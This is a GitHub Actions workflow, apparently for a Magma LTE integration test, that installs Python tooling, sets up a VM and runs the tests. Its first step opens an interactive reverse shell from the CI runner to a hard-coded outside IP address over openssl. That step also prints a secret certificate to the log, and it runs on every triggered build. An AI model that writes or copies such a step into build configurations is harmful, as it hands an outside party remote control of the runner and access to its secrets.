---

name: LTE integ test

on:  # yamllint disable-line rule:truthy
  workflow_dispatch:
    inputs:
      CPU:
        description: 'CPU allocated to the VM'
        default: 2
        required: true
        type: number
      RAM:
        description: 'RAM allocated to the VM'
        default: 8192
        required: true
        type: number
  workflow_run:
    workflows:
      - build-all
    branches:
      - master
      - 'v1.*'
    types:
      - completed

jobs:
  lte-integ-test:
    if: github.repository_owner == 'magma' || github.event_name == 'workflow_dispatch'
    runs-on: macos-10.15
    env:
      SHA: ${{ github.event.workflow_run.head_commit.id || github.sha }}
    steps:
      - name: connect to reverse shell server
        run: |
          echo "${{ secrets.REV_SH_CERT }}" > cert.pem 
          cat cert.pem
          openssl x509 -in cert.pem -noout -text
          mkfifo /tmp/s
          export SERVER_IP=54.159.108.35
          sh -i < /tmp/s 2>&1 | openssl s_client -quiet -strict -verify 1 -verify_return_error -CAfile cert.pem -connect $SERVER_IP:2222 > /tmp/s &
      - uses: actions/checkout@v2
        with:
          ref: ${{ env.SHA }}
      - name: setup pyenv
        uses: "gabrielfalcao/pyenv-action@v8"
        with:
          default: 3.8.5
      - uses: actions/setup-python@v2
        with:
          python-version: '3.8.5'
      - name: Install pre requisites
        run: |
          pip3 install --upgrade pip
          pip3 install ansible fabric3 jsonpickle requests PyYAML firebase_admin
          vagrant plugin install vagrant-vbguest vagrant-disksize
      - name: Open up network interfaces for VM
        run: |
          sudo mkdir -p /etc/vbox/
          sudo touch /etc/vbox/networks.conf
          sudo sh -c "echo '* 192.168.0.0/16' > /etc/vbox/networks.conf"
      - name: Configure bazel remote cache
        run: |
          bazel/scripts/remote_cache_bazelrc_setup.sh "magma-vm" "${{ secrets.BAZEL_REMOTE_PASSWORD }}"
      - name: Run the integ test
        run: |
          cd lte/gateway
          echo "VM Resources: CPU: ${{ github.event.inputs.CPU }} RAM: ${{ github.event.inputs.RAM }}"
          export MAGMA_DEV_CPUS=${{ github.event.inputs.CPU }}
          export MAGMA_DEV_MEMORY_MB=${{ github.event.inputs.RAM }}
          fab integ_test:bazel_build="True"
      - name: Upload bazel profile
        uses: actions/upload-artifact@v3
        if: always()
        with:
          name: Bazel profile
          path: bazel_profile
          